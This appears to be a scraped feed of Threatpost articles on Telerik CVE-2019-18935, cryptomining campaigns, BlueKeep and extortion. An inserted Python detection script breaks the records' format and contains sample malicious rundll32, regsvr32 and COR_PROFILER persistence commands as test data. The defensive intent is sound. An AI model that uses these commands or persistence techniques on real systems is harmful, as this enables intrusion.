Yet after two weeks of radio silence from Telerik \u2013 McNamara claims he made multiple phone calls, emails, requests to high-level account managers \u2013 he decided to disclose the bug independently \u2014 only to have the company release its information \u201cout of the blue,\u201d hours before he was planning on releasing his, last Wednesday.\n\n\u201cResolving this politely was tough,\u201d McNamara admits, claiming the issue lasted as long as it did due to a lapse in responsibility.\n\n\u201cThis is a technical product sold to technical developers, and Telerik wanted the developers to share the responsibility of security. The developers probably didn\u2019t know that,\u201d McNamara said.\n\nWhile RadEditor\u2019s filters cover some attack vectors \u2013 namely the RemoveScripts filter to strip out script tags \u2013 the attack technique that McNamara used \u201cis not your typical XSS.\u201d\n\n\u201cBy using lesser-known attacks I found a way through,\u201d McNamara said, adding that he put to use some old research by WhiteHat Security\u2019s Jeremiah Grossman to help dig up the vulnerability.\n\nSpecifically the vulnerability employs attribute-based cross-site scripting without relying on JavaScript tags. 
It\u2019s also harder to detect because the web editor has to process many different obfuscated elements, notably dynamic properties like CSS Expressions, used in older builds of IE, in addition to JavaScript.\n\nIn a blog entry Telerik [posted on Wednesday](<http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks>) the company addressed the issue and gave credit to McNamara but stood pat on its stance that the responsibility of sanitizing content to prevent threats should fall to the developer.\n\n\u201cIt is always the duty of the developer to implement the necessary content validation,\u201d Nikodim Lazarov, one of the company\u2019s senior software developers wrote.\n\nThe company is slated to push out a patch for the issue but not until it updates the Q3 edition of its controls, in late October. In the meantime Telerik is [giving users a workaround](<http://feedback.telerik.com/Project/108/Feedback/Details/137364-prevent-possible-xss-attack-in-radeditor-using-malicious-content-in-ie>) that it\u2019s strongly recommending users follow until its patch is pushed.\n\nMcNamara, who works as an application security engineer at the IT services provider CGI, says that he\u2019s planning to do further research in his spare time on other rich text editors like RadEditor to see if he can find similar problems.\n\n\u201cMost of the company\u2019s user base is likely unaware that they silently integrated a high-risk vulnerability into their site,\u201d McNamara says of bug in closing, \u201cSystem owners signed off on this without knowing.\u201d\n", "modified": "2014-10-01T19:22:03", "published": "2014-09-29T12:15:03", "id": "THREATPOST:DDF98CD337434196370FDCA7D39C0ED0", "href": "https://threatpost.com/radeditor-web-editor-vulnerable-to-xss-attacks/108594/", "type": "threatpost", "title": "Web Editor Vulnerable To XSS Attacks", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": 
"2020-05-07T21:56:19", "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology (VST) plug-ins. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. 
\u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to run a Linux image in a VM \u2013 more specifically, a Tiny Core Linux 9.0 image configured to run XMRig. The miner inside the image joins a mining pool and consumes the victim\u2019s CPU power on the pool\u2019s behalf.\n\nMalik noted that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. 
The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:29", "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. 
Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML, a technique in which script running in the browser exchanges data with the server without reloading the page. Progress Telerik UI for ASP.NET AJAX is a suite of server-side UI controls for ASP.NET applications built on that technique.\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. It is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on chaining exploits.\n\nIn the current attacks, Blue Mockingbird attackers are finding unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. 
Red Canary has observed three distinct execution paths: execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution via regsvr32.exe with the /s (silent) command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. 
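The execution and persistence techniques listed above, turned into detection logic as an added example that is not Red Canary's or Threatpost's code. It runs six rules over constructed Windows process-creation and registry telemetry: an IIS worker (w3wp.exe, the process a Telerik exploit lands in) spawning a shell or LOLBin, rundll32 with the fackaaxv export or a non-system DLL, silent regsvr32 of a non-system DLL, wmic or registry writes that set the CLR profiler variables (COR_ENABLE_PROFILING, COR_PROFILER, COR_PROFILER_PATH, which is what a COR_PROFILER hijack configures), and a ServiceDll pointing outside the system directories. Event field names, file paths, the service name and the CLSID are made up for the demo.

```python
"""Added example, not code from Red Canary or Threatpost: detection rules for the
Blue Mockingbird tradecraft described in the article, run over constructed
Windows process and registry events. Paths, service name and CLSID are invented;
the export name fackaaxv is from the write-up."""
import ntpath

# Where a legitimately installed DLL is expected to live (compared lower-cased).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")
IIS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe"}
PROFILER_VALUES = {"cor_enable_profiling", "cor_profiler", "cor_profiler_path"}
SERVICES_KEY = "hklm\\system\\currentcontrolset\\services\\"


def outside_system_dirs(path: str) -> bool:
    return not path.strip('"').lower().startswith(SYSTEM_DIRS)


def process_rules(ev: dict) -> list:
    """Initial-access and execution-path rules for one process-creation event."""
    out = []
    toks = ev["cmdline"].split()          # demo command lines contain no quoted spaces
    image = ntpath.basename(toks[0].strip('"')).lower()
    parent = ntpath.basename(ev.get("parent", "")).lower()
    if parent == "w3wp.exe" and image in IIS_CHILDREN:
        out.append(("BM-1", f"IIS worker process spawned {image}: {ev['cmdline']}"))
    if image == "rundll32.exe" and len(toks) > 1:
        dll, _, export = toks[1].strip('"').partition(",")
        if export.lower() == "fackaaxv" or outside_system_dirs(dll):
            out.append(("BM-2", f"rundll32 loading {dll} export {export or '(default)'}"))
    if image == "regsvr32.exe" and any(t.lower() == "/s" for t in toks[1:]):
        dlls = [t.strip('"') for t in toks[1:] if t.lower().endswith(".dll")]
        if any(outside_system_dirs(d) for d in dlls):
            out.append(("BM-3", f"silent regsvr32 of non-system DLL(s) {dlls}"))
    low = ev["cmdline"].lower()
    if image == "wmic.exe" and "environment" in low and "cor_" in low:
        out.append(("BM-4", f"wmic setting a CLR profiler variable: {ev['cmdline']}"))
    return out


def registry_rules(ev: dict) -> list:
    """Persistence rules for one registry value-set event."""
    out = []
    key, name, value = ev["key"].lower(), ev["value_name"].lower(), str(ev["value"])
    if name in PROFILER_VALUES and key.endswith("environment"):
        out.append(("BM-5", f"CLR profiler hook: {ev['value_name']}={value}"))
    if (key.startswith(SERVICES_KEY) and key.endswith("\\parameters")
            and name == "servicedll" and outside_system_dirs(value)):
        out.append(("BM-6", f"service DLL outside system directories: {value}"))
    return out


def analyze(events: list) -> list:
    """Returns (rule_id, detail) findings in event order."""
    findings = []
    for ev in events:
        findings += process_rules(ev) if ev["type"] == "process" else registry_rules(ev)
    return findings


# Constructed telemetry: five events in the Blue Mockingbird pattern, then two benign ones.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": r"rundll32.exe C:\Windows\Temp\payload.dll,fackaaxv"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32.exe /s C:\ProgramData\payload.dll"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic.exe ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="{cf0d821e-299b-5307-a3d8-b283c03916db}"'},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment",
     "value_name": "COR_PROFILER_PATH", "value": r"C:\Windows\Temp\payload.dll"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\ConstructedSvc\Parameters",
     "value_name": "ServiceDll", "value": r"C:\Windows\Temp\payload.dll"},
    {"type": "process", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\BITS\Parameters",
     "value_name": "ServiceDll", "value": r"C:\Windows\System32\qmgr.dll"},
]

if __name__ == "__main__":
    for rule_id, detail in analyze(SAMPLE_EVENTS):
        print(rule_id, detail)
```

The two benign events exercise the false-positive side: rundll32 of a System32 DLL with a normal export and a stock ServiceDll both pass silently. BM-1 is the highest-value rule for this campaign, since an IIS application pool identity has no business launching rundll32 or wmic regardless of which Telerik CVE got the attacker there.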
The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n", "cvss3": {}, "published": "2020-05-07T21:01:37", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "modified": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. 
\u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so where Network Level Authentication (NLA) is enabled, an attacker without valid credentials would still need to get past it, since NLA requires authentication before the vulnerable code path can be triggered.\n\nThe BlueKeep RCE vulnerability (CVE-2019-0708) exists in Remote Desktop Services and impacts older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. 
\u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. 
And the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2013 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we can't deploy to 18.24% because of downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). 
\u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-13T11:25:12", "description": "In less time than it takes to get a stuffed crust pizza delivered, a new group called SnapMC can breach an organization\u2019s systems, steal its sensitive data, and demand payment to keep it from being published, according to a new [report from NCC Group\u2019s threat intelligence team](<https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/>) \u2014 no ransomware required.\n\nRather than disrupting business operations by locking down a target\u2019s data and systems, SnapMC just focuses on straight-up extortion. However, this low-tech, ransomware-free approach to extortion on a compressed timeline relies on known vulnerabilities with patches readily available.\n\n\u201cIn the extortion emails we have seen, SnapMC has given victims 24 hours to get in contact and 72 hours to negotiate,\u201d the report said. 
\u201cThese deadlines are rarely abided by, since we have seen the attacker start increasing the pressure well before the countdown hits zero.\u201d\n\nThe researchers weren\u2019t able to link the group to any known threat actors and named it for its speed (\u201cSnap\u201d) and its exfiltration tool of choice, mc.exe.\n\nAs evidence the group has the data, SnapMC provides victims with a list of the exfiltrated data. If they fail to engage in negotiations within the timeframe, the attackers threaten to publish the data and report the breach to customers and the media.\n\nAnalysts said they\u2019ve observed SnapMC successfully breaching unpatched and vulnerable VPNs using the [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) remote code execution bug in Telerik UI for ASP.NET AJAX, and web-server apps using SQL injection.\n\n## **VPN Vulnerabilities**\n\nA recent rise in VPN vulnerabilities has left companies exposed, according to Hank Schless, a senior manager with Lookout cloud security.\n\n\u201cWhile VPN solutions have their place, there have been multiple stories of vulnerabilities within these solutions that were exploited in the wild,\u201d Schless explained to Threatpost. \u201cEnsuring that only authorized and secure users or devices can access corporate infrastructure requires zero trust network access (ZTNA) policies for on-premise or private apps and cloud access security broker (CASB) capabilities for cloud-based apps and infrastructure.\u201d\n\nLast June the Colonial Pipeline was breached with an [old VPN password](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>). 
And last July [SonicWall issued a patch](<https://threatpost.com/sonicwall-vpn-bugs-attack/167824/>) for a bug in older VPN models the company no longer supports, after attacks came to light that were part of a wider ongoing campaign exploiting [CVE-2019-7418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481>).\n\nThe following month, [Cisco Systems issued a handful of patches](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>) for the 8,800 Gigabit VPN routers vulnerable to compromise through [CVE-2021-1609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609>).\n\nAnd by late last month, the National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) issued guidance to the Department of Defense, National Security Systems and the Defense Industrial Base to [harden their VPNs](<https://threatpost.com/vpns-nsa-cisa-guidance/175150/>) against threats from multiple nation-state advanced persistent threat (APT) actors.\n\nNation-state actors aside, basic patching would protect against this latest smash-and-grab attempt at data extortion from the likes of SnapMC.\n\n## **Ransomware\u2019s Evolution**\n\nOliver Tavakoli, CTO with Vectra, said that getting rid of the encryption piece of the attack altogether is a \u201cnatural evolution\u201d of the ransomware [business model](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>). The NCC team likewise predicts the trend toward simple attacks on shorter timelines is likely to continue.\n\n\u201cNCC Group\u2019s Threat Intelligence team predicts that data-breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack,\u201d the team said. 
\u201cTherefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T11:22:00", "type": "threatpost", "title": "30 Mins or Less: Rapid Attacks Extort Orgs Without Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"], "modified": "2021-10-13T11:22:00", "id": "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "href": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "description": "A high-severity bug has been found that allows remote attackers to hijack 
Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing, securing and managing industrial assets.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOn Wednesday, Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it 
said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers that are running a vulnerable release of Cisco IOS XR Software and participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) (CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in the web-based user interface (Web UI) of Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n", "cvss3": {}, "published": "2019-06-06T17:43:57", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1845", "CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "modified": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>), [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winnti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened 
activity.\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, 